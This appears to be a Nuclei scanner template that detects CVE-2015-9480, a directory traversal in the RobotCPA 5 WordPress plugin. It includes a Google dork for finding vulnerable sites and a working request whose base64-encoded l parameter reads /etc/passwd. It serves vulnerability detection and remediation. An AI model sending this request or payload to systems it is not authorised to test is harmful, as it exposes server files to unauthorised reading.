47 lines
1.6 KiB
YAML
47 lines
1.6 KiB
YAML
id: CVE-2015-9480
|
|
|
|
info:
|
|
name: WordPress RobotCPA 5 - Directory Traversal
|
|
author: daffainfo
|
|
severity: high
|
|
description: The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter.
|
|
impact: |
|
|
An attacker can access sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation.
|
|
remediation: |
|
|
Update to the latest version of the WordPress RobotCPA 5 plugin to fix the directory traversal vulnerability.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/37252
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-9480
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2015-9480
|
|
cwe-id: CWE-22
|
|
epss-score: 0.35852
|
|
epss-percentile: 0.97147
|
|
cpe: cpe:2.3:a:robot-cpa:robotcpa:5:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: robot-cpa
|
|
product: robotcpa
|
|
framework: wordpress
|
|
google-query: inurl:"/wp-content/plugins/robotcpa"
|
|
tags: cve2015,cve,wp-plugin,lfi,edb,wordpress,robot-cpa
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100ca3463b6480386c127ceead01d1fba65f58939cbca13de5c6b43f2854051505602205e021914f8bbc4cbc1e20b1f3606f0de3d47057ae412735e8e96fe3679a545f3:922c64590222798bb761d5b6d8e72950 |